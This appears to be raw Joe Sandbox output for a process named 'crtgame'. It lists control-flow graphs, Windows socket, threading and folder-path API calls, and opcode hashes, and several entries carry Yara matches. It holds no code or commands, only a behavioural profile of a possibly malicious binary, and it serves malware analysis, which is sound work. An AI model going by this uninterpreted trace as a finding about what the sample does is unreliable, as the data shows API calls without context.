                                                                              control_flow_graph 601 2c21ba7-2c21bcf call 2c44df0 RtlEnterCriticalSection 604 2c21bd1 601->604 605 2c21be9-2c21bf7 RtlLeaveCriticalSection call 2c2dcbc 601->605 606 2c21bd4-2c21be0 call 2c21b79 604->606 607 2c21bfa-2c21c20 RtlEnterCriticalSection 605->607 613 2c21be2-2c21be7 606->613 614 2c21c55-2c21c6e RtlLeaveCriticalSection 606->614 609 2c21c34-2c21c36 607->609 611 2c21c22-2c21c2f call 2c21b79 609->611 612 2c21c38-2c21c43 609->612 616 2c21c45-2c21c4b 611->616 619 2c21c31 611->619 612->616 613->605 613->606 616->614 618 2c21c4d-2c21c51 616->618 618->614 619->609
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C21BAC
                                                                              • RtlEnterCriticalSection.NTDLL ref: 02C21BBC
                                                                              • RtlLeaveCriticalSection.NTDLL ref: 02C21BEA
                                                                              • RtlEnterCriticalSection.NTDLL ref: 02C21C13
                                                                              • RtlLeaveCriticalSection.NTDLL ref: 02C21C56
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterLeave$H_prolog
                                                                              • String ID:
                                                                              • API String ID: 1633115879-0
                                                                              • Opcode ID: 396d01aa84ac9ecef63380985845c50a33022d061ca41cfc6b460a74526ddd18
                                                                              • Instruction ID: 736179e13ab8bfe9b809ec545d0a3082965a32e763a583f4402a8d04f7b5e1e9
                                                                              • Opcode Fuzzy Hash: 396d01aa84ac9ecef63380985845c50a33022d061ca41cfc6b460a74526ddd18
                                                                              • Instruction Fuzzy Hash: 9421A1B9900614EFCB14CF68C44479ABBB5FF88714F158549EC1997302DBB4EA09CBE0

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • WSASetLastError.WS2_32(00000000,?,?,?,?,?,02C2358B,?,?,?,?,?,?,?,02C28FA9,?), ref: 02C22EEE
                                                                              • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02C22EFD
                                                                              • WSAGetLastError.WS2_32(?,02C2358B,?,?,?,?,?,?,?,02C28FA9,?,?,?,00000001,00000006,?), ref: 02C22F0C
                                                                              • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02C22F36
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$Socketsetsockopt
                                                                              • String ID:
                                                                              • API String ID: 2093263913-0
                                                                              • Opcode ID: fc795afc5ce15c285e1cef54e865659c826b4cd7a67982f0eacd2d051d1fcb0f
                                                                              • Instruction ID: 38500ce5caf06d0198b59682b294d7de181ed267744902c2fcdb8065be0f4d30
                                                                              • Opcode Fuzzy Hash: fc795afc5ce15c285e1cef54e865659c826b4cd7a67982f0eacd2d051d1fcb0f
                                                                              • Instruction Fuzzy Hash: 14018876940214FBDB309F66DC88B5BBBA9EB85771F008A65FD08CB141D7718904CBA0

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 630 2c22db5-2c22dc8 631 2c22de4-2c22de8 630->631 632 2c22dca-2c22dd2 call 2c30510 630->632 633 2c22dea-2c22ded 631->633 634 2c22dfc-2c22e07 call 2c22d39 631->634 641 2c22dd8 632->641 633->634 636 2c22def-2c22dfa call 2c30510 633->636 640 2c22e0c-2c22e11 634->640 636->641 643 2c22e13 640->643 644 2c22ddd-2c22de3 640->644 645 2c22ddb 641->645 646 2c22e16-2c22e18 643->646 645->644 646->645 647 2c22e1a-2c22e35 call 2c30510 call 2c2166f 646->647 652 2c22e37-2c22e52 call 2c30510 call 2c2166f 647->652 653 2c22e54-2c22e97 WSASetLastError select call 2c29e92 647->653 652->645 652->653 659 2c22ea6 653->659 660 2c22e99-2c22ea4 call 2c30510 653->660 663 2c22eb6-2c22eb8 659->663 664 2c22ea8-2c22eb3 call 2c30510 659->664 665 2c22ebe-2c22ed2 call 2c22d39 660->665 663->645 663->665 664->663 665->646 671 2c22ed8 665->671 671->644
                                                                              APIs
                                                                                • Part of subcall function 02C22D39: WSASetLastError.WS2_32(00000000,?,?,00000001,?,?,02C23390,00000001,?,00000000,?,?,?,?,?), ref: 02C22D47
                                                                                • Part of subcall function 02C22D39: WSASend.WS2_32(?,?,?,00000000,00000000,00000000,00000000), ref: 02C22D5C
                                                                              • WSASetLastError.WS2_32(00000000,00000000,?,?), ref: 02C22E6D
                                                                              • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02C22E83
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$Sendselect
                                                                              • String ID: 3'
                                                                              • API String ID: 2958345159-280543908
                                                                              • Opcode ID: 996d179e1f588183223f810f08cf006d1e4b167571041c286babbdba5fcdc7b4
                                                                              • Instruction ID: 27b3a55e4a657caa4c7c12636ad2ea0b3a21ffd9d94c910a3fbc8e9071716694
                                                                              • Opcode Fuzzy Hash: 996d179e1f588183223f810f08cf006d1e4b167571041c286babbdba5fcdc7b4
                                                                              • Instruction Fuzzy Hash: 2B31B0B6A002299FDF15DF65C8047EE7BEAEF44314F00495AEC0497240EBB49559DFE1

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • WSASetLastError.WS2_32(00000000,?,?), ref: 02C22AEA
                                                                              • connect.WS2_32(00000010,?,?), ref: 02C22AF5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLastconnect
                                                                              • String ID: 3'
                                                                              • API String ID: 374722065-280543908
                                                                              • Opcode ID: d85d5bbc1fd3770631c7c5720b4d0a1e6e7e568917043967a7af56def96bd350
                                                                              • Instruction ID: 52b5225d565427a4e157c2d09992c4714ed03d3d585db67056911d4dbb5dfdfd
                                                                              • Opcode Fuzzy Hash: d85d5bbc1fd3770631c7c5720b4d0a1e6e7e568917043967a7af56def96bd350
                                                                              • Instruction Fuzzy Hash: 0721CC76D00214ABDF14EFB5C4046AEBBBADF84324F104599DC1997381EFB456099FD2

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 703 2c2353e-2c23555 call 2c44df0 706 2c23576-2c2359c call 2c22edd 703->706 707 2c23557-2c23571 call 2c21996 703->707 713 2c2359e-2c235a8 706->713 714 2c235ad-2c235c3 CreateIoCompletionPort 706->714 712 2c23688-2c23697 707->712 715 2c23684 713->715 716 2c235c5-2c235d9 GetLastError call 2c30510 714->716 717 2c235db-2c235e2 call 2c30510 714->717 718 2c23687 715->718 723 2c235e4-2c235ed 716->723 717->723 718->712 724 2c23626-2c23630 723->724 725 2c235ef-2c23624 call 2c30510 call 2c229ee 723->725 726 2c23632-2c23633 724->726 727 2c23640 724->727 725->718 730 2c23635-2c23638 726->730 731 2c2363a-2c2363e 726->731 732 2c23644-2c2366a call 2c2d87f 727->732 730->732 731->732 737 2c23671-2c23681 call 2c30510 732->737 738 2c2366c call 2c2143f 732->738 737->715 738->737
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog
                                                                              • String ID:
                                                                              • API String ID: 3519838083-0
                                                                              • Opcode ID: 068196df83c92e3aff17a77668848cadba38b60ae559f5163575c4ec4df41d12
                                                                              • Instruction ID: 89edbbe5ee0cc309c03e3bbc4d40b3ec0c5bbfc29f926be4bf2869336cc72f78
                                                                              • Opcode Fuzzy Hash: 068196df83c92e3aff17a77668848cadba38b60ae559f5163575c4ec4df41d12
                                                                              • Instruction Fuzzy Hash: 43514BB190425ADFCB19DF68C4406AABBB5FF48320F14855EE8299B381DB74DA14CF91

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 742 2c2369a-2c236b1 InterlockedIncrement 743 2c236b3-2c236b7 742->743 744 2c236b9-2c236c1 742->744 745 2c23722-2c2372d call 2c2247d 743->745 746 2c236c3-2c236ca 744->746 747 2c236cc-2c236fc WSARecv WSAGetLastError 744->747 755 2c2373a-2c2373c 745->755 746->745 749 2c23705-2c2370f 747->749 750 2c236fe-2c23703 747->750 751 2c23712-2c23715 749->751 750->751 753 2c23717-2c2371c 751->753 754 2c2372f-2c23735 call 2c22420 751->754 753->754 756 2c2371e-2c23721 753->756 754->755 756->745
                                                                              APIs
                                                                              • InterlockedIncrement.KERNEL32(?), ref: 02C236A7
                                                                                • Part of subcall function 02C22420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C22432
                                                                                • Part of subcall function 02C22420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02C22445
                                                                                • Part of subcall function 02C22420: RtlEnterCriticalSection.NTDLL(?), ref: 02C22454
                                                                                • Part of subcall function 02C22420: InterlockedExchange.KERNEL32(?,00000001), ref: 02C22469
                                                                                • Part of subcall function 02C22420: RtlLeaveCriticalSection.NTDLL(?), ref: 02C22470
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                              • String ID:
                                                                              • API String ID: 1601054111-0
                                                                              • Opcode ID: be4ab8e3f9a00b452baae10fffe343b245c68ae4c3a98e33cdd5cc2f28809230
                                                                              • Instruction ID: c48001732b2c2cef5eb9e3ddcf44335f6511c94da44188212dab1e071f4f9945
                                                                              • Opcode Fuzzy Hash: be4ab8e3f9a00b452baae10fffe343b245c68ae4c3a98e33cdd5cc2f28809230
                                                                              • Instruction Fuzzy Hash: 7011C1B5100258ABDF218E14CC85FAA3BAAFF50750F104556FE528B2D0CF38E968CB94

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 758 2c31af0-2c31b12 call 2c32db9 761 2c31b14-2c31b18 758->761 762 2c31b19-2c31b2f 758->762 763 2c31b31-2c31b34 762->763 764 2c31b3d-2c31b50 ResumeThread 762->764 763->764 765 2c31b36-2c31b37 CloseHandle 763->765 765->764
                                                                              APIs
                                                                              • __beginthreadex.LIBCMT ref: 02C31B06
                                                                              • CloseHandle.KERNEL32(?,00000000,?,?,?,?,02C2A5DA,00000000), ref: 02C31B37
                                                                              • ResumeThread.KERNELBASE(?,00000000,?,?,?,?,02C2A5DA,00000000), ref: 02C31B45
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandleResumeThread__beginthreadex
                                                                              • String ID:
                                                                              • API String ID: 1685284544-0
                                                                              • Opcode ID: 6aac113702601551c08e5e9a091b9be42711ed72c4bcd1a2da7a5ecedc815f45
                                                                              • Instruction ID: 5521950dd2c601ab45b7f72be1aebf0aec10cb3f7b77924a7538ea365fcd416e
                                                                              • Opcode Fuzzy Hash: 6aac113702601551c08e5e9a091b9be42711ed72c4bcd1a2da7a5ecedc815f45
                                                                              • Instruction Fuzzy Hash: 11F0C8747402009FD7209E5CDC80FD173D8AF88328F18096AF548C7280D3B1E8929AD0
                                                                              APIs
                                                                              • InterlockedIncrement.KERNEL32(02C57524), ref: 02C21ABA
                                                                              • WSAStartup.WS2_32(00000002,00000000), ref: 02C21ACB
                                                                              • InterlockedExchange.KERNEL32(02C57528,00000000), ref: 02C21AD7
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Interlocked$ExchangeIncrementStartup
                                                                              • String ID:
                                                                              • API String ID: 1856147945-0
                                                                              • Opcode ID: def52d54676f29c82fc8a4610d01539f29d7ae1f255e6d76b7ceb627a360d18c
                                                                              • Instruction ID: fcdbbeaa057dc3eff24d15fff67b6f10b5d64d74cff1ddcb2ddeaca5d40ca8d1
                                                                              • Opcode Fuzzy Hash: def52d54676f29c82fc8a4610d01539f29d7ae1f255e6d76b7ceb627a360d18c
                                                                              • Instruction Fuzzy Hash: 7AD02EB4D802145BF21066A0AC0EB3AF3ACE700610F800B60FC2AC00C0EB50A9ACC1EA
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C24B1D
                                                                                • Part of subcall function 02C21BA7: __EH_prolog.LIBCMT ref: 02C21BAC
                                                                                • Part of subcall function 02C21BA7: RtlEnterCriticalSection.NTDLL ref: 02C21BBC
                                                                                • Part of subcall function 02C21BA7: RtlLeaveCriticalSection.NTDLL ref: 02C21BEA
                                                                                • Part of subcall function 02C21BA7: RtlEnterCriticalSection.NTDLL ref: 02C21C13
                                                                                • Part of subcall function 02C21BA7: RtlLeaveCriticalSection.NTDLL ref: 02C21C56
                                                                                • Part of subcall function 02C2DA84: __EH_prolog.LIBCMT ref: 02C2DA89
                                                                                • Part of subcall function 02C2DA84: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C2DB08
                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 02C24C1D
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                              • String ID:
                                                                              • API String ID: 1927618982-0
                                                                              • Opcode ID: acd8bb7f72a19f0023bad7098265d26eba0f5652b989c4a4fd99fdd706496e04
                                                                              • Instruction ID: 61f70b27f6494b75117bc82ce718a4b45f2272ea0eb1ebf96fb92367344b99a4
                                                                              • Opcode Fuzzy Hash: acd8bb7f72a19f0023bad7098265d26eba0f5652b989c4a4fd99fdd706496e04
                                                                              • Instruction Fuzzy Hash: F2513BB1D04258DFDB15DFA8C484AEEFFB5AF48314F14816AE906AB351DB709A48CF60
                                                                              APIs
                                                                              • WSASetLastError.WS2_32(00000000,?,?,00000001,?,?,02C23390,00000001,?,00000000,?,?,?,?,?), ref: 02C22D47
                                                                              • WSASend.WS2_32(?,?,?,00000000,00000000,00000000,00000000), ref: 02C22D5C
                                                                                • Part of subcall function 02C29E92: WSAGetLastError.WS2_32(?,00000080,00000017,02C23114), ref: 02C29EA0
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$Send
                                                                              • String ID:
                                                                              • API String ID: 1282938840-0
                                                                              • Opcode ID: 1b3cd673863a5a4c0cd75fdb703c99097f4261b7ff4b1189e61813153add09fe
                                                                              • Instruction ID: e8704e00a14d99866b4fefd75c0184a7ebbdb1fb5ebf5b198f0da8ec0e46ed95
                                                                              • Opcode Fuzzy Hash: 1b3cd673863a5a4c0cd75fdb703c99097f4261b7ff4b1189e61813153add09fe
                                                                              • Instruction Fuzzy Hash: B3017976500215EFD7209F55884456BB7EDFB44750B10096EE85983200EB709D04DBA1
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C25049
                                                                                • Part of subcall function 02C23D7E: htons.WS2_32(?), ref: 02C23DA2
                                                                                • Part of subcall function 02C23D7E: htonl.WS2_32(00000000), ref: 02C23DB9
                                                                                • Part of subcall function 02C23D7E: htonl.WS2_32(00000000), ref: 02C23DC0
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: htonl$H_prologhtons
                                                                              • String ID:
                                                                              • API String ID: 4039807196-0
                                                                              • Opcode ID: 4da1a1de32a8fb3b04bf6027110f0296da9c0e34f8f11b33100607576392843a
                                                                              • Instruction ID: f68efe8891b7e4aa2b0e2aa4cc52d25b4819fb2ba15da57e97fe3e8bbe7fd55e
                                                                              • Opcode Fuzzy Hash: 4da1a1de32a8fb3b04bf6027110f0296da9c0e34f8f11b33100607576392843a
                                                                              • Instruction Fuzzy Hash: 9F814C71D0026E8ECF09DFA8D5806EEBBB5EF88310F10815AD855B7280EB755A49CFA5
                                                                              APIs
                                                                              • SHGetSpecialFolderPathA.SHELL32 ref: 02CA3C08
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C5A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C5A000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c5a000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: FolderPathSpecial
                                                                              • String ID:
                                                                              • API String ID: 994120019-0
                                                                              • Opcode ID: 2d977c71ea2b25280dab88f2b0f4f7015c99a4a617a71e9c94bc7c5857929ed0
                                                                              • Instruction ID: a7f964b95e2da1143abd2b66bffc58f5039b994771b2f455890631da4654e73c
                                                                              • Opcode Fuzzy Hash: 2d977c71ea2b25280dab88f2b0f4f7015c99a4a617a71e9c94bc7c5857929ed0
                                                                              • Instruction Fuzzy Hash: C72181F260C604AFE7157A0DEC46BBABBE4EB84720F06893EE7C547B50E631584186D7
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C2E352
                                                                                • Part of subcall function 02C21A01: TlsGetValue.KERNEL32 ref: 02C21A0A
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prologValue
                                                                              • String ID:
                                                                              • API String ID: 3700342317-0
                                                                              • Opcode ID: 013596d0ed8b1a26b384ee6b14bbc7f86b5e8bbbbbdff0f25acbf1b92a55a378
                                                                              • Instruction ID: daec3b151def4595290b493e1618fc715c4cce4803ba81b658a9da4fd32535c4
                                                                              • Opcode Fuzzy Hash: 013596d0ed8b1a26b384ee6b14bbc7f86b5e8bbbbbdff0f25acbf1b92a55a378
                                                                              • Instruction Fuzzy Hash: 5D213EB6904219AFDB04DFA5D540AFFBBF9EF48311F10452EE908E7240DB71AA04DBA1
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C2DEE2
                                                                                • Part of subcall function 02C226DB: RtlEnterCriticalSection.NTDLL(?), ref: 02C22706
                                                                                • Part of subcall function 02C226DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02C2272B
                                                                                • Part of subcall function 02C226DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02C45553), ref: 02C22738
                                                                                • Part of subcall function 02C226DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02C22778
                                                                                • Part of subcall function 02C226DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02C227D9
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                              • String ID:
                                                                              • API String ID: 4293676635-0
                                                                              • Opcode ID: 90aaddd57fed936aadec8d661ae0331981b801181ce2cd5c26738bef17f09807
                                                                              • Instruction ID: a6245b8a1a7af693d30a89e1a64c5bee8765d76f4d84c0e7d634d78157033e37
                                                                              • Opcode Fuzzy Hash: 90aaddd57fed936aadec8d661ae0331981b801181ce2cd5c26738bef17f09807
                                                                              • Instruction Fuzzy Hash: 830190B5900B149FC328DF1AD640996FFF5EF88710B15C5AE944A8B721EB71AA40CF94
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C2DCC1
                                                                                • Part of subcall function 02C3354C: _malloc.LIBCMT ref: 02C33564
                                                                                • Part of subcall function 02C2DEDD: __EH_prolog.LIBCMT ref: 02C2DEE2
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog$_malloc
                                                                              • String ID:
                                                                              • API String ID: 4254904621-0
                                                                              • Opcode ID: 5783897a4f2722a2de1a582b8d5cb87b43fc3dce8ee7ad5429e0dc0e156049de
                                                                              • Instruction ID: d445e4d9fe9de9553cfad327ca6d836b2dce2d9c796e3306662878e13a1d6dca
                                                                              • Opcode Fuzzy Hash: 5783897a4f2722a2de1a582b8d5cb87b43fc3dce8ee7ad5429e0dc0e156049de
                                                                              • Instruction Fuzzy Hash: 0DE0C2B1A4424AABDB1DEFA8D80073E77A6EB44300F104AADB809D3640DF708A009A41
                                                                              APIs
                                                                                • Part of subcall function 02C3565A: __getptd_noexit.LIBCMT ref: 02C3565B
                                                                                • Part of subcall function 02C3565A: __amsg_exit.LIBCMT ref: 02C35668
                                                                                • Part of subcall function 02C32E93: __getptd_noexit.LIBCMT ref: 02C32E97
                                                                                • Part of subcall function 02C32E93: __freeptd.LIBCMT ref: 02C32EB1
                                                                                • Part of subcall function 02C32E93: RtlExitUserThread.NTDLL(?,00000000,?,02C32E73,00000000), ref: 02C32EBA
                                                                              • __XcptFilter.LIBCMT ref: 02C32E7F
                                                                                • Part of subcall function 02C38794: __getptd_noexit.LIBCMT ref: 02C38798
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                              • String ID:
                                                                              • API String ID: 1405322794-0
                                                                              • Opcode ID: 9a0a9f47854afeae931929786d85e5669722c28d9e0460847d5e0f0e44082a64
                                                                              • Instruction ID: 472d6d59b1de3acc0fd3c262bd765b29813296d3d40198fbce3b51ed8c51fbea
                                                                              • Opcode Fuzzy Hash: 9a0a9f47854afeae931929786d85e5669722c28d9e0460847d5e0f0e44082a64
                                                                              • Instruction Fuzzy Hash: C2E0ECB2940600DFEB09BBA0D849F2D77B6AF05301F200959F5019B260DAB8AD40AF21
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C5A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C5A000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c5a000_crtgame.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandle
                                                                              • String ID:
                                                                              • API String ID: 2962429428-0
                                                                              • Opcode ID: ad9e67a5dbf4182818223fb27fdbbfa945e541fbd82ee891e07dca1715771f1b
                                                                              • Instruction ID: bfae3da56a4913fa29a9970277f025cc291a253711afbec4ed1a77cfbd678a38
                                                                              • Opcode Fuzzy Hash: ad9e67a5dbf4182818223fb27fdbbfa945e541fbd82ee891e07dca1715771f1b
                                                                              • Instruction Fuzzy Hash: 6811B4B310C3089FE3057F6DEC856BAB7E9EF84620F06492EE6C1C3600DA316544C697
                                                                              APIs
                                                                                • Part of subcall function 02C31010: OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 02C310B0
                                                                                • Part of subcall function 02C31010: CloseHandle.KERNEL32(00000000), ref: 02C310C5
                                                                                • Part of subcall function 02C31010: ResetEvent.KERNEL32(00000000), ref: 02C310CF
                                                                                • Part of subcall function 02C31010: CloseHandle.KERNEL32(00000000,A5B40990), ref: 02C31104
                                                                              • TlsSetValue.KERNEL32(00000025,?), ref: 02C31BAA
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseEventHandle$OpenResetValue
                                                                              • String ID:
                                                                              • API String ID: 1556185888-0
                                                                              • Opcode ID: 6749feeb06201c0291085e414144c02b9c1e99170d026915188fec732cba7575
                                                                              • Instruction ID: 459eebb59d6c9ab0c32551479f7faec76c152a1c52f3eb769d9bf69c87913ebf
                                                                              • Opcode Fuzzy Hash: 6749feeb06201c0291085e414144c02b9c1e99170d026915188fec732cba7575
                                                                              • Instruction Fuzzy Hash: CD01DF72A00244AFD700CF59C805F5ABBACFB057B0F144B6AF829D3680D771A9008AE4
                                                                              APIs
                                                                                • Part of subcall function 02C29462: __EH_prolog.LIBCMT ref: 02C29467
                                                                                • Part of subcall function 02C29462: _Allocate.LIBCPMT ref: 02C294BE
                                                                              • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02C303A2
                                                                              • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02C303AA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateErrorFormatH_prologLastMessage
                                                                              • String ID: Unknown error$invalid string position
                                                                              • API String ID: 58466617-1837348584
                                                                              • Opcode ID: 49476b785662bba064a15cb7acfc32083084758ef502fd678c8c15daa9a458f0
                                                                              • Instruction ID: 172a4d655412469ab146b833eb3b4f71c69768a3f0e68f5447bea45918b7b8c9
                                                                              • Opcode Fuzzy Hash: 49476b785662bba064a15cb7acfc32083084758ef502fd678c8c15daa9a458f0
                                                                              • Instruction Fuzzy Hash: 0051AA716083419FE715CF24C880B2FBBE4AB98758F500D2DF48697292D771E688CF96
                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,02C34896,?,?,?,00000001), ref: 02C38F2D
                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 02C38F36
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled
                                                                              • String ID:
                                                                              • API String ID: 3192549508-0
                                                                              • Opcode ID: 547bfb5df3f506e4113eb18a65570c636a9ae72e2fa57b1e4d391d3cc364bfad
                                                                              • Instruction ID: c32ced0ff370891aeafe4db2ac49568fab965ce044387a600010bb3a32f72d7f
                                                                              • Opcode Fuzzy Hash: 547bfb5df3f506e4113eb18a65570c636a9ae72e2fa57b1e4d391d3cc364bfad
                                                                              • Instruction Fuzzy Hash: C0B09239486208EBCB012F91FC0DB8ABFA8EB04662F004950F60E440618B7264289AE2
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C224E6
